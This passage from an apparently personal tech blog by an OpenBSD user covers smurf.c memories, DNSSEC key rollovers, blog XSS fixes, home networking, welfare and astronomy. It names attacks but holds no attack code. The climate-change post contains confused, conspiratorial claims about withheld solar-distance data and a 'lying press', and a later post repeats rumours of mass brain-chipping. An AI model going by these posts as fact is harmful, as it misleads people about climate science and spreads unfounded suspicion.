off the broadcasting function. He told me this himself. In 1999 TFreak and
I toured the USS Pampanito (Museum submarine) at Pier 45 (Fisherman's Wharf)
in San Francisco. Maybe he's a submarine captain in another life :-), or a
sonar operator or whatever :-). He'd be bouncing sound off thermal layers
or something in a broadcast storm. But somehow I think he'd prefer the IP
reflection rather than sound.
Also RIP to chris@unix.org who (rumour told me) also died in the first decade
of the second millenium. He was also mentioned in smurf.c. TFreak and I met
Chris in a bar in Toronto's northern end once (around 1998). That's where I
met him first time IRL when it wasn't on IRC.
In the end talking about smurf.c is like talking about a gun. A gun that can
be amplified to nuclear proportions when not kept in check. This is why in
IPv6 there is no broadcasting at all... they use Multicasting which is
subscribed afaik. I don't think I would have released smurf.c if I had written
it, but TFreak was 15 or 16 at the time. I was aware that many IRC operators
became smurf targets (as is the default text in Hybrid-IRCD). And I'm aware
that some people went to jail for using smurf. I'd just like to say that
when given a weapon you use your best judgement and put it away. I never used
smurf outside of a 2 computer LAN back then, and I had guidance of others to
be above this. It's a buried hatchet, but I remember it.
Updated the Main splash page
October 6th, 2018
You may have noticed I replaced the main
splash page. This was part of a CGI I wrote to make a spinning triangle.
I liked it so much that I put it on my front page. Enjoy!
Do we really know, are you sure?
October 9th, 2018
The earth is getting hotter in the atmosphere. We know this, it's never felt
so hot during summers and our last few winters have been rather mild. But
what if the sun is closer to earth (or the earth closer to sun) than ever
before? What nonsense! Oh really? We are not being presented with any data
on a yearly basis, with records of past centuries, of the parallax that the
sun is giving us. So we just don't know. If the sun is at a constant 1 AU
as they say year after year then perhaps the sun is getting warmer? No? Why
not? Again we're not presented with the data. How can we make an informed
argument in the countless arguments with global warming deniers, when we haven't
considered all the data? It's a one sided statement don't you think?
Now.
Think of combustion, we know that it pollutes. This pollution is the
combustion of oil which is liquid carbon, this has 3 outputs: kinetic energy
which makes a car move, heat and carbon monoxide/dioxide (I'm not sure of
which one it is, but when you hear of carbon monoxide poisonings it's usually
associated with cars). We know that carbon dioxide is a greenhouse gas. This
means that in the atmosphere enough dispersed carbon dioxide molecules cause
sunlight and sunheat to be trapped in the layer between the earth and the
troposphere or stratosphere. So we can attribute global warming to the ever
increasing car, truck, bus combustions. The oceans are said to trap some of
this carbon dioxide in its water, from which life like krill and corals take
their carbon in order to exist. Larger life like whales eat krill in masses
and they are a living storage of carbon so is other life. But the carbon in
the oceans are said to acidify the oceans, which changes and erases life. Also
afaik the oceans are saturated with the capacity of carbon dioxide.
Also could it be that our galactical neighbourhood could affect temperatures on
earth? Why is there ice ages? And why are tehy periodic? Does our direction
of the sun in relation of the Galactic Center (GC) cause an effect on earth?
Remember that the sun travels/orbits around the GC in roughly 270 million years?
We're part of the milky way spiral galaxy. So this should change our view of other galaxies out there.
Again we're not allowed to judge for ourselves because newspapers do not offer
this data. They'd rather write about the daily temperatures of Rome, London
and Madrid. Not that this would do anyone any good if they're not travelling.
Sure it's nice to know these temperatures but it gives no hard data as to why
we're heating up in the global climate. It's sad. The germans call the medias
"Lügenpresse" and maybe this is why? We can only get better by exposing
what lacks the person to make up their own mind, until then it's all a vague
story.
There is 1.3 million+ cameras in Germany
October 9th, 2018
According to this article there is
1.3 million cameras (german) in Germany of this vulnerable type alone.
this is one for every eighty citizens in Germany. And I'm sure there is a
million more of another type. I'm shaking my head at this.
a.root-servers.net did not update its KSK in an atomic manner
October 11th, 2018
I took three samples of the DNSKEY's of the root zone from a.root-servers.net
today. What stunned me for 20 minutes roughly was that the change of the KSK
update was not atomic. Here the data samples (3):
Joy. I'm not that insane, I know what I saw, and you can see what I saw too.
StenSea, Storing Elecricity/Energy at Sea
October 12th, 2018
I may have written about this before, but here is the concept of spheres
that are submerged in around 700 meters deep water.
It's called stensea and seems to be in cooperation with Hochtief an
engineering company that makes among other things highrise buildings. It's
an interesting concept nontheless. It popped up in conversation so I decided
to write an article.
Five to Eleven
October 17th, 2018
These puppies came by at five to eleven AM.
Then at eleven AM the air raid sirens sounded. I wonder who they were
visiting? It took me until 11:15 to find out that it was a bavarian wide
air-siren test. Also the helos didn't fly that close I edited the photo
one was already gone and the second and third I got a good shot of.
I didn't hear them return I don't think. So they finally pushed the
silent mode button! Thank god!
OpenBSD 6.4 released yesterday
October 19th, 2018
I have upgraded 2 computers so far and have made one a test lab for testing
smtp. It took me a bit of trial and a friend sent me his configs and I
managed to fix the configs I had. Soon I'll be upgrading this VPS.
Thanks to OpenBSD staff for making this release possible!
Delphinusdnsd-current unveil'ed
October 19th, 2018
I made the broad claim that delphinusdnsd is the safest DNS server in the
OpenBSD hegemony. And who knows? Perhaps I'm right? I just unveil'ed
delphinusdnsd so access to files other than the configs aren't allowed.
NSD doesn't unveil (yet). And for the moment delphinusdnsd
really is the safest.
Github had a partial outtage
October 22nd, 2018
I'M currently evaluating github, but I don't like what I see. In my view
it's better to self-host. However when I die my sources may go under with
me. On Github they may remain forever. Hard to say.
Did the Microsoft buyout of github have anything to do with this?
Upgraded Omega, unveiled a few things
October 23rd, 2018
I have upgraded omega, my mail and web vps. I have unveiled this blog, and
added an unveiled delphinusdnsd on this. Rejoice!
Deleted VPS/droplet psi.virgostar.net
October 28th, 2018
Two years ago I got this vps at digital ocean. Today I removed it. I'm saving
10 dollars a month roughly. I'm back down to 4 VPS's now.
Proprietary battle blows
October 29th, 2018
IBM buys Red Hat, Microsoft makes deals with NSA and US Defence. Where will
it lead? So far OpenBSD hasn't sold out. That's why I'm loyal to it.
What's IBM gonna do with Red Hat or better said what will they do with AIX now
that they have Red Hat? Could this be its deathblow? What is Microsoft gonna
do for the NSA with Windows? Will they program any/more back doors? All in
all this could be good for projects like OpenBSD.
Happy Hallowe'en
October 31st, 2018
Well Halloween 2018 is here. I already had about 5 kids at my apartment door
and they were not restrained taking the sweets I had for them. All in all I'm
very happy (and a little sad that I only have candy's left for myself). Happy
Halloween. Remember the Halloween documents!
New load for my solar setup
November 7th, 2018
Since the router that was doing Freifunk isn't on the battery anymore I was
looking for new things to take the charge off the solar battery. I have now
found one. For the second time now I have charged my ipod off that solar
setup. 100% solar electricity, whoohoo! And mostly afternoon/evening sun too!
I'm glad I had the equipment for this. I'm using a HAMA 2.1 Amp USB adapter on
the 12V car electric port hub that I have. The Apple provided cable seems to
be good enough. 5V * 2.1 Amp == a bit over 10 Watts. But the ipod only
requires 5 Watts and sucks only that much to charge maximum. Seriously Super!
Delphinusdnsd development: Plan A and Plan B
November 15th, 2018
As you know I had a shorter development period this year. In december I'll
find out if delphinusdnsd work will be funded by the prototypefund or not.
That falls under plan A. But what if I don't get funding? That's where
plan B falls in. I have recently checked how old the DNSSEC keys are for
the centroid.eu zone and have noticed they are already 2.5 years old roughly.
The need to be rolled. So if I don't get plan A which will likely last until
mid-year next year I'm slowly going to work on making delphinusdnsd capable
for rolling KSK keys. ZSK keys it can already roll. All in all I want to
be able to roll a KSK in 1.5 years. This will make the 1024 bit KSK key of
centroid.eu potentially weak if already under attack. I need to make this a
2048 bit key as well. So that's plan B, and it takes higher precedence than
the things I wanted to do for plan A. If I get plan A I'll be done with plan
B maybe mid 2020. We'll see. I also had a project going to port OpenBSD/macppc
to 64 bit. That project was under way since july and it looks like a fail
right now. I had at least hoped I'd be able to boot the kernel in 64 bit mode.
I'll keep poking on it until christmas as said but I don't want to get my hopes
up too much. After christmas I'll be focusing mainly on delphinusdnsd again
and I want to consider a POP3S (S for secure) daemon as a part-time project.
So my hands are really full for 2019, I can't take on much more, also because
I'll likely need to find work (at latest after july 2019) again and that will
rob time from my pet projects as well.
Encrypting with acme-client and Letsencrypt
November 15th, 2018
I have started TLS'ing a test domain called
"goldflipper.de". If everything works out well I'll turn up encryption
on all my domains from tomorrow forward. I'm excited over the simplicity of
this all.
This blog should be TLS encrypted now
November 17th, 2018
Enjoy. Make sure you see the lock at the URL input in your browser. My next
challenge is to keep the TLS up to date so that it doesn't expire.
Hartz IV - the welfare system in Germany
November 18th, 2018
I was, for seven years what germany calls a "langzeitarbeitsloser". Long word
made of double-speak. It means that I was a long-time welfare recipient, and
likely unemployable. The Hartz IV system gave me a job back then in 2010. It
was at the Red Cross and I was supposed to make a PHP program. After one year
they fired me. I think it was because I was too expensive for them. Anyhow
I got an overlapping job since 2010 and it lasted until march 2018. So I was
continually employed for the last eight years. I'm not a langzeitarbeitsloser
anymore, by any standard but when I went back to Hartz IV this year because I
did not qualify for any supportive unemployment insurance I was told I made
too much savings over the last eight years and thus would not get any money.
Really I lived on the bare minimum for the last 15 years, and thus while I was
working I was able to put some money away. This money is done in 2020 some
time as I'M averaging a gross of 1300 EUR a month. There is no way to get
lower than that currently unless I move. Now when I get Hartz IV again if I
don't find a job in that time, they'll likely force me to move out of an
apartment that I made my home for the last 5 years. Only where? There is a
housing crisis currently in Schweinfurt. Affordable apartments don't exist
much and they are building more luxurious condos instead of affordable housing.
So in my opinion I'm a middle classer even though I'm really in poverty. I
find it outrageous when a CDU chancellor candidate says he's middle class when
he has a million in his bank account. This can't be real.
I'm all for the
government (SPD) push for reforms in the welfare system, and I'm waiting to see
if there is anything that will benefit me, when I'm allowed to take welfare
again. I'm not squandering money, I don't drink, I don't do drugs. I feel
I needed to be open about this and my social status, there is no way I'm
getting rich off anything. And everything is getting more expensive. Have a
pleasant weekend!
First snow day of 2018/2019
November 20th, 2018
The snow came in the morning, but didn't stay long. It was nice seeing the
flakes though.
Proud new owner of 3 OpenBSD Mugs
November 21st, 2018
Today the parcel arrived with 4 new mugs. I'm giving one away, the rest I'm
keeping. I also have another mug with the OpenBSD puffy logo. This will be
enough for 4 days out of the working week to use one. :-)
Uranus is not in Pisces anymore
November 22th, 2018
Today by chance while checking an
interesting article, I used xephem to check where Uranus is.
apparently it's crossed the border to Aries a while back. Interesting! Also
this "interesting article" was wrong, HD186302 is in Pavo not Norma.
Also see this article from my blog, when Uranus was still in Pisces.
I got my christmas present early
November 27th, 2018
I ordered this 9U cabinet with my dad last night. It's an effort to make
my hallway in my apartment look nicer and more professional. I'm hoping
everything works out, on how I planned it.
Record usage this month
November 29th, 2018
November has 1 day left roughly. I'm very happy that I have more usage.
Octobers stat was off because I rotated the stats file then. I'm very
happy about the visits particularily. The volume can be attributed to
a mistake at a search engine that downloaded some files over and over.
Thanks to all who visited!
Did not get the grant I applied for
November 29th, 2018
Unfortunately I did not get the grant from prototypefund.de and indirectly the
german government. Now I can finally say shit against this government again.
I won't be muzzled on this blog. On to plan B (look at older articles). This
also means I have more pressure to find work by 2020.
Dread at the controls!
November 29th, 2018
Congratulations to Reggae Music for their inscription
on the representable list of the intangible cultural heritage of Humanity
(UNESCO). It is my favourite type of music too and I share your joy!
Google's secretive Dragonfly designed to inhibit human rights
November 30th, 2018
If you haven't heard about dragonfly, now you have. You bet they are going to
introduce this into democratic countries eventually. Google stop it now!
Considering taking a course at IHK next year
December 1st, 2018
This course
seems viable. Since I'm using OpenBSD I'm already security conscious, and I'll
learn about the IT security coordination for other OS's. Could be good for me.
The course starts mid-january 2019 on a part time basis. I'll have to make a
final decision between christmas and new years of 2019.
The PowerPC64 Port Project
December 4th, 2018
Since July of this year I was trying to port OpenBSD/macppc to 64 bit PowerPC.
This did not work and I'm pulling the plug on this, I've wasted enough time
on this. It's a fail but somehow I'm happy it's over. This work probably
requires hacking on clang, binutils which I did not want to do, because it
requires skills I do not possess or want right now. The macppc ecosystem is
changing too. Eventually it'll be built by clang (some other people are
working on this) and perhaps when that is working there is a stepping stone
to get back to this. But perhaps not. The code is gonna rot over time who
knows. If you're interested in this keep an eye out for
my final update. I'm going to make a
downloadable CVS available most likely.
I've been an OpenBSD User 20 years now
December 4th, 2018
I think sometime in 1998 I installed OpenBSD as my workstation at Globalserve
an ISP in Toronto at the time (they were aquired by Primus.ca).
I remember somewhat that the screen was blue and orange(???). But the dmesg was
blue and white (or was it?). Something like that. I was very happy that the
newest changes
back then (the strlcpy/strlcat) were just put in place. It was the safest OS
at the time I bet. I got help online on IRC from someone who was/is an OpenBSD
developer. I came from a FreeBSD background and before that Linux in 1995 and
was torn on what to like more. In 2000 at BSDCon in Monterey I made a decision
finally to embrace OpenBSD fully (I bought the shirt didn't I?). Well here is
a glass of American Ginger Ale (sorry have no access to Canada Dry here), to
my being a loyal user for 20 years.
An Inter-connected World
December 4th, 2018
Recently in conversation with a neighbour of my parents, she was astounded
that Internet Exchange points existed and the Internet didn't look criss
crossed like the paths in this african photo:
The above is more a mesh network, and is expensive. What we have in Germany
and most of the world is accessible hubs called exchange points. These
exchange points offer peering between their subscribers (which are ISPs mostly)
, there is a few in this vicinity let me list a few for you:
DE-CIX Frankfurt, the biggest internet exchange in the EU
These Internet exchange points offer "peering" which means that you generally
let traffic flow at little or no cost. The opposite is "transit" providers who
connect you to the backbone at cost. There is a few that come to my mind.
and many more. These can also be divided up in Tier I through Tier III NSP's
(network service providers), depending if they have their own global backbone
or not. It is entirely possible that a transit provider will take on peering
at a peering point and transport packets further across continents. So in
that regard the division between peering and transit intermixes a little.
Here is some more links I have written up over the course of the 10 years that
I've had this blog:
Well it was an attempt at least. BTW DE-CIX is hiring.
Investing in Microsoft
December 6th, 2018
I have put a plan forward that instead of schooling on something that I
already know I'm going to build a network here at home to get better with
the skills I already aquired. I'm going to lay aside 3000 EUR for Microsoft
products in order to build a 3 client test network here at home. This is
roughly what I'd be shelling out for a 160 hours course. I'm looking toward
buying Microsoft Windows Server 2019, vmware fusion upgrade and Microsoft
Windows Pro for 3 workstations here at home. Whatever money is left from that
I'll see where I can put that into.
So hold on that's not all. Since I dislike investing into Microsoft so much
money I'M going to make a donation to OpenBSD as well covering 1000 EUR split
in two transactions (once in 2019 and once in 2020 for ~440 EUR). This puts
OpenBSD and Microsoft pretty much evenly in the amount of money I spent on
both (including CD buys and donation money over the years).
Why am I doing this? I'm at a real crossroad here. I would prefer to
work with OpenBSD but circumstances don't allow me to work at some place like
Genua Gmbh or someone. And noone here in this region has ever heard of
OpenBSD. This means that employers require someone to have Windows knowledge.
And they have the dough that I ultimately need. Even though I took a course
for Windows Server 2003 in 2004, I'm very insecure on Microsoft products.
When I build this network I'm sacrificing one OpenBSD box that is currently
on and one FreeBSD box that is currently off. They'll be running the Windows.
I'm retaining the majority of servers and routers here running OpenBSD.
It may appear as a desperate move but reality says I'm not going to be using
OpenBSD at work if I want a job, so it's really a smart move. Also there is
a smart saying with "don't put your eggs all in one basket". Well I'm done
gushing the news, I'M going further the plan by new years.
Happy St. Nicolaus day
December 6th, 2018
Happy St. Nics. Were your stockings filled this morning? Mine weren't but I
got the idea of investing some money into Microsoft (see below). Thanks Nic!
Buju Banton released December 7th
December 10th, 2018
Buju Banton was released from prison in Florida and has been flown to Jamaica.
He is the General
of Reggae music. His sentence was a farce IMO and his time served a waste of
human life. Whether he was able to further himself in prison? I do hope so.
Now he has to find hold of life again, he has a huge family, and everything
will have to be sorted out. But I do hope to see him on album eventually.
I still have to buy other albums of his, so far the two (three, when counting
mr. mention which i lost in canada) are the only ones I have.
Set up my Christmas present
December 11th, 2018
This is what I got for Christmas (in advance).
I'm having some physical problems getting it to look nice inside so this is
what it is for now.
Doodling, making a network map
December 12th, 2018
Enjoy.
The Comments system
December 13th, 2018
Someone made me aware that the blog was unsafe through comments. I have tried
to fix this by patching the comment filtering, and I think this is good now.
I'm unsure if this was the intended area where they said a XSS (cross site
scripting) vulnerability was able to take place. The persons who reported this
must have looked through the open source component of this blog since I cannot
find any comments that are infested. If you read messages by going to the
site with a webbrowser and aren't clicked on a message particularily to see the
comments, you would never have been vulnerable anyway. If you read messages
by RSS then you would have been open to an attack, but again I didn't find
evidence of XSS attacks in comments as they aren't deletable and I have all
comments, still. I grep'ed through them and did not find anything.
Since it was unsure what the reporter of the bug wanted, I have paypal'ed him
twenty Euros. It's not a big money amount but it's enough to take someone
special to dinner (although a cheap dinner). I'm thankful people like this
exist. The blog does give me joy to write in so I don't think the 20 EUR are
gonna be missed. I have updated the sources at the "Open Source" link on the
right side of this blog, and you can see where exactly the vuln happened.
Big Dipper, a fine asterism
December 16th, 2018
This is the image of the big dipper as taken in 2010. Below it I wrote the
names of the individual stars (systems) that comprise the big dipper.
If you follow the imaginary line from Merak to Dubhe for 5 times the width
between Merak and Dubhe you find Polaris (the north star currently). This
rule will not be forever as the North Star shifts due to progression of the
equinoxes (it was Thuban in constellation Draco, 4000 years ago). If you
follow the Megrez-Alioth-Mizar-Alkaid arc in springtime you eventually find
Arcturus (Follow the arc to arcturus, ...) and if you extend that arc it will
take you to the star Spica (...and speed on to spica), which is alpha virginis.
Finally isn't it time that we learned these names and what they represent?
These names are arabic. The Arabs were the first to name these stars. If you
had a C64, do you remember the game Alkaid? *smile*. Here is
more to read if you want
to know more about the big dipper.
Second snow day of the season
December 16th, 2018
It is snowing currently as I write this. The snow is laying on the ground and
not melting immediately unlike the first snow day that I recorded. Happy 3rd
advent.
December Solstice is 5 days away
December 16th, 2018
Also the official start of winter then. Happy time!
Alnitak in the East
December 16th, 2018
In winter the northern hemisphere has a good view of Orion and thusly Orion's
belt. Alnitak meaning belt in arabic is easternmost (to the left).
Alnilam meaning "string of pearls" is in the middle. Perhaps a good
way to remember it is to read the last 3 letters backwards, "mal in the middle"
as in the TV show "malcolm in the middle". Mintaka is westernmost and
also means belt, it is not exactly on the same extended line as Alnitak and
Alnilam. The image above I took in 2010.
Year in review 2018
December 20th, 2018
There won't be a year in review this year. I need to write a script to
automate this and I don't feel like doing either this year. I'm not sad
or upset, just not in the mood for big work right now. :-). Happy
solstice tomorrow! Enjoy the years longest night (if you are in the north)!
Seasons Greetings
December 21st, 2018
I want to wish everyone who reads this blog a happy solstice, merry christmas
and happy new year. If you don't celebrate christmas that's ok too, you're
included anyhow. I'm going to be celebrating christmas with my parents which
means there is little time to do any coding. In fact there is only 2 days
left where I can code on something and I'm just taking it easy as most tasks
have been done. I got my christmas present already, but I'm looking forward
to the time spent with family. They are the most important people in my life
anyhow. So have a good time, stay safe! I'll probably post some more articles
before new years but there is not more than ten articles left for the year.
We're one year away from 2020, isn't this exciting? 2019 will be good too
I hope.
Archived EnhancedRISC.de
December 21st, 2018
I have archived enhancedrisc.de with the wayback machine today. The project
has ended in a fail. What was written is saved. And the domain will expire
in 2019. The powerpc64 port was not meant to be in 2018 I guess. I won't
embrace it either until there is breakthroughs in the compile-process. Until
then no powerpc64 for me. I'm going to mothball the G5 most likely as it
does consume a lot of power. I'm only interested to pull it back out for
porting work for powerpc 64 bit. I think you can understand this. I'm
already paying 100 EUR more electric bill next year and don't have to increase
it by another 100 EUR just for running macppc. It doesn't make sense to run
this box until I can apply 64 bit processing to it.
Oh Christmas twig, Oh Christmas twig...
December 24th, 2018
This is what our tree/twig looks like. It looks great IMO. I helped decorate
it. Don't worry, this is only half the presents, and I already got mine.
Goldflipper wishes you Merry Christmas
December 25th, 2018
On another site of mine (goldflipper.de) is a new page.
Merry Christmas from Goldflipper. May 2019 bring us all a better storyline.
German Spy Service thought to spy en-masse at Internet Exchange Point
December 28th, 2018
The maintainer of the IX point has lost a challenge in court to remove the
BND spy service from Frankfurt (Europes biggest IX). There is only one thing
left to do now. Dissolution of the IX.
The fabric of Germany's IP network may be better off without such a huge IX
in its midst. It should be natural to be able to fight mass spying. And it
should not be at any length be illegal. Stay tuned!
Transitioning from a Star to a Mesh
December 30th, 2018
DE-CIX (the frankfurt exchange point) is a victim to its own success. The
honey is sweet here, hence it's easy for parasytes like BND to spy here. The
realisation that a mesh is really a set of stars that are interconnected can
be seen in the picture (I made it myself). What we need is a few more "mini"
IX's that complete the fabric from transitioning from star to mesh. Some links
will need to be taken out and others will have to be shortened in order to
route around Frankfurt. It's costlier, so expect your internet to become
costlier too. We also need better routing that won't just take the shortest
path but also the safest path (around a potential spy node). More on this
later.
DE-CIX: Traffic tripled, BND still spies there after six years
December 30th, 2018
In my archives I found this link (german). Notice the date... 2013. It's close to 2019 now. Meaning
the honey is very sweet in Frankfurt for the BND. And.. the current management
of DE-CIX don't really seem to mind much, you'd think after 6 years they might
have done an action other than taking the Republic to court over this. Somehow
I think this is all old news and recycled.
Open vs. Closed
December 30th, 2018
I have been thinking around this often. I use OpenBSD which promises security,
yet functionality and at free cost. In conversation people often mention this
"great open society". But what challenges does an open society really have?
For one you can simplify and think of security vs. functionality as a scale
like in the constellation sign "libra" of the zodiac. But is this a false
view of the world? When we think of a closed society (ie. Germany in 1942, or
Soviet Union in 1982) what would you say if I said European Union in 2018?
Think of laws as the prescription for a society. A totally closed society you
can do nothing. You shouldn't even try because the default policy is a black
list. On the other hand a totally open society you can do everything, the
default policy is a white list. Obviously in all societies there is the meaning
of law and order. Meaning you don't go out and kill at will just because there
there is no law. So in this context, an open model has a modification, it has
a "black entry" on something you can't do. In this case murder. Throw in the
security. Now what changes? An Open Society has to add 153 exception policies
into its fabric, and the Closed Society does nothing. Is it more secure? In
a systematic approach are "hacks" or exception policies wanted? Or should we
just let it be closed? Then throw freedom into the mix and guess who has to
add nothing and who has to write exceptions to grant citizens a feeling of
being wanted, given opportunity too, in order to progress.
It's a never-ending philosophical debate I would think but if there is a way
to find a balance between open and closed without systematically hacking the
default policy, I'd like to know about it.
Happy New Year 2019
December 31st, 2018
As I write this the earth already rolled into 2019. Currently the east coast
of Australia is celebrating new years. It will be new years here in about
10 hours. I'm likely going to have a quiet new years. I'm at my parents but
going to bed at 8PM or so. Whether I'll get woken at midnight will depend
on other people whether they decide to have fireworks this year or not.
So happy new year 2019. One year away from 2020! May peace be unto thee.
2019, Something great is about to happen...
January 1st, 2019
I'm sitting on 1000 EUR of donation money for OpenBSD. I will begin paying out
half of that shortly. By end of May I should have paid the full amount minus
the small donation I gave to Gilles Chehade of OpenSMTPD in late 2018 (unless
something unexpected happens and I have to use it for something else). Either
way it all makes it into the OpenBSD eco-system. I'm very proud of this and
I'm making sure that my investments in Microsoft will never surpass the invest
ment for OpenBSD.
My self-education schedule for 2019
January 1st, 2019
I'm learning Microsoft Windows (Server and Active Directory). My schedule
looks like this:
Saturday->Monday family + reading books
Tuesday + Thursday Windows Administration (34 days or 272 hours)
Wednesday + Friday Delphinusdnsd + Windows Programming (34 days or 272h)
Start: January 7th, 2019
Duration: 17 weeks
End: May 3rd, 2019
I'm going to have a very ghetto basics course that I'm developing as I go. I'm
using literature to guide me. Also I'm looking at jobs on the side, but I'm
not going to apply for a Windows job until May 3rd as I'd really like to learn
more about this system first. If a good UNIX job comes along I'll apply to it
likely before May 3rd. I'm very excited about this all and I'm glad I have the
opportunity to do this. Here is a list of books I purchased last year that I
will receive today.
Mastering Active Directory - Francis, Dishan
Gruppenrichtlinien in Windows Server und Windows 10 - Holger Voges et al.
Windows Server 2019: Praxiseinstieg - Joerg Schieb
I'm sure I'll find valuable things in these books. I'm also going to start
another course in June if no job found by then, it'll likely run until October.
In it I believe I want to learn reverse engineering tools in Windows. Not sure
if I'll get there yet. Like said I'm very excited.
My switch at home is too loud
January 1st, 2019
The 10 GbE switch is too loud. I'm going to work today to set a timer on it
so that it turns off at 8PM and turns on at 8AM. Also I'm going to set up
a wireless alternative path from office to Internet (and from living room to
Internet). This requires trunk(4) and bridge(4) modifications in OpenBSD.
In theory it should work, but we'll see about that really.
Donated 15 EUR to F3Netze
January 3rd, 2019
I have donated to the offspring from Freifunk Franken. I don't use Freifunk
anymore personally but I think it's a great concept, within reason. I left
Freifunk because I did not have enough time at the time, and I still don't
have enough time :-).
New redundant setup
January 4th, 2019
As you know my switch is very loud. Until I can fix it I have set up a
redundant setup here at home, using trunk(4) and OSPF (ospfd). I'm gonna
try to cover the configs here.
This causes gif0 to go on when ix1 (switch) is not available, and reverts back
to switch when it turns on. I have a timer on the switch, at a 12 hour Hz.
Lastly the living room is not served with OSPF. It is just a trunk interface
and looks like this:
uranus$ more /etc/hostname.trunk0
trunkport em0
trunkport em5
trunkproto failover
inet 192.168.177.40 255.255.255.0 192.168.177.255
inet6 autoconf
up
Trunk notices the link going from active to inactive and does a failover from
trunkport em0 to trunkport em5 (which is connected directly to the router).
It all seems to work out. There is a caveat. When ssh'ed from office to the
Internet and OSPF returns back to the switch in the morning, the session
expires because it came from the wifi's interface endpoint. Also when it's
evening and the switch turns off, one has to clear the ARP cache in the office,
because it still thinks 192.168.177.3 (my dns server) is on the local link.
Once it is cleared it routes via wifi.
Ambitious goal: have KSK's rotated by first week in February
January 5th, 2019
I have reviewed my code in dddctl.c of delphinusdnsd and determined for it
to be mostly good. Next week I'll start coding on this again. I want to
rotate my KSK keys of my DNSSEC zones by first week in February. I'm very
so much looking forward to this day as it means that it's an important
step in delphinusdnsd's development. Basically one could make keys back in
2015 but by now they are 4 years old and weakened by time. When I have done
this work, I can look further toward other TODO's that I had planned.
Other things that the project needs is a clean-up of the website. The
handbook is somewhat outdatedly using dd-convert.c still. This needs to
be updated to use dddctl.c. It will be easy though.
The endless debate around Computer-System security
January 6th, 2019
Recently in conversation it dawned on me that we're really stuck in a lake full
of shit, and our boat is sinking. Let me explain. Person I talked to said
that to drive a car he doesn't have to know about how the car functions in
detail, he gets on the wheel and drives. A computer should be the same, you
don't care about anti-virus, or security knowledge, you just get on and surf.
He expects the government to do something in regards to the security. I don't
share that viewpoint because the government would be invasively monitoring us
all for the sake of security. It adds up to surveillance.
Similarily in infrastructure, we mentioned that powerplants should not be on
the Internet. But in todays world powerplants have to be turned on and off
depending on demand, and this needs to be signaled. So then I said why can't
powerplants be on their own "internet" (small i) but not on the big Internet
(big I). This is a costly solution, but also a safe solution. Because when
the power is off because of hackers we wish it were so. Again the argument was
that government should protect these companies and they should not care a damn
about security themselves. Reality is they have an IT department that is
supposed to take care of these, they are powerplants and have lots of money.
The BSI (Bundesamt fuer Sicherheit am Internet?) can only do certification
programmes and guidelines, anything beyond that is again intrusive to everyones
privacy and would be monitored en-masse. Should the BSI have the control that
the BND in the Frankfurt IX currently enjoys? With firewalls all along the
way managed by them (perhaps with help of an artificial intelligence)? I say
no. We must keep this centralized component out of our Internet. Everyone
has a responsibility to have an IT contact who gets paid full time to look over
networks. It's the decentralized approach and is supposed to minimize mass
surveillance. What do you think? Why don't you discuss this with your peers?
We talked about a "family IT person" who looks after the families computers,
is this good or bad? Everyone wants to squeeze money but security forces us
to squeeze more than our wallets, we actually have to think to defend ourselves
_and_ make decisions. We should not let the government do these decisions for
us! Government is a control-freak and will make it the worst-case scenario for
us all.
More XSS vulns
January 11th, 2019
I have been informed that there is more XSS vulns on my blog. This one was
not as easy to solve as the last time I fixed XSS vulns. I had to actually
write a bit of code. I noticed with this "double-sanitizing" that html code
injections were possible through the search system not just XSS.
I have an open source blog this means you can see the changes. Here is
the code history with comments. Enjoy, and sorry if you were
vulnerable to an XSS attack.
Delphinusdnsd performed two KSK rollovers over 30 hours
January 11th, 2019
I finally had the code right, but one KSK rollover was botched. This
was due to the wrong instructions of RFC 6781 section 4.1.2. I should
have looked in the Errata section of this RFC. The result due to the
botched effort of rolling the KSK of the zone dtschland.eu is that if
you got the DS key of this from the eu. nameservers it will not be
validated because the old DNSKEY was rolled out in the dtschland.eu. zone.
The rollover should keep the old rolled out key around for 86400 seconds,
as is being done for the freifunk-schweinfurt.de zone. Here is the listing
of dnskey's of that zone:
These are the key pid's that are currently active. After tomorrow 18:00, the
59532 key can be safely removed.
I'm going to be working on all my DNSSEC'ed zones to roll ZSK and KSK over the
next few weeks. I have services on some domain names so this process must
work. I must work out any kinks before I do any such changes. Someone told
me that RFC 7583 is important to read. Also I have written up the process
for rolling a KSK with delphinusdnsd here in the delphinusdns.org's handbook.
Reset all comments
January 12th, 2019
I have reset all comments in the blog. This is easier than going through
the list of 600+ comments and seeing if there was XSS content. This is
for your safety, however uninforming as some articles added to the content
in articles. Sorry for any inconvenience. If you need to restore a
comment there is an archive but please only ask me to restore it if it's a
life vs. death situation.
Rolling all KSK keys this week
January 14th, 2019
I'm rolling all KSK keys of my zones/domainnames this week. I started on
virgostar.net today, I'm shifting each day 1 new domain name. Until
saturday. I have 7 DNSSEC domain namenames and 2 I have already done. They
were the test domains. Everything after today has services on it and I can't
screw it up. Wish me luck!
Got a new switch
January 16th, 2019
I have taken fitch the HPE switch out active switches in the apartment. It's
a datacenter switch and has a noise level of 45 decibels. I'll use it as
such thankfully 10 Gbit Ethernet will be around for a while. I always wanted
to colo somewhere so this is a step in that direction.
I have replaced fitch with snitch the netgear switch. It is a
"GS110EMX - 8-Port Gigabit Ethernet Smart Managed Plus Switch with 2-Port 10G/Multi-Gig Uplinks" type switch. Notice I didn't want to get rid of my 10 GbE
completely so I got them as uplinks. For now this will be OK. Thankfully it's
fanless and doesn't make a noise. Funny that for a switch I named snitch.
I'd be careful of Elon Musks Mars plans
January 18th, 2019
If you were asked to join Mars colonists by Elon Musk, you'd probably be
excited. Would you be as excited if you knew you'd wear a microchip in
your brain? This is what Elon Musk has prophesized that in order to
"counter" the threat of an AI taking over humans and humans must adapt.
It seems to me that humans who chip themselves lose their humanity.
I have heard rumours that we'll all be chipped some day and our actions
would be pre-determined or pre-processed to be flag innocent or guilty of
resisting the system. When we're chipped we'll be stripped of all humanity
and we'll continue on as a new species. Not exactly promising. I personally
think a PC would be enough for a human. If only there wasn't this problem
with wear on eyes and fingers in order to interface. I'm quietly thinking
around how a speech-hearing interface would be best done.
Planning on dumping 6 domain names, keeping 4
January 19th, 2019
I'm planning on dumping everything but these domain names:
centroid.eu
delphinusdns.org
dtschland.eu (will remain a test zone)
unspecified hosted domain name
What this means is that by July 2020 the others will all be
expiring. 5 of the 6 are actually .de domain names and I'm
saving quite a bit by not renewing. I view it all as a
trimming the fat or consolidation effort. Since dtschland.eu
was gotten a few years ago for 10 years I don't have to renew
it but the other 3 I'm going to renew for two years or so.
To help with this effort I'm also going to be getting three new
vps's and retiring two. The remaining I'm going to rename.
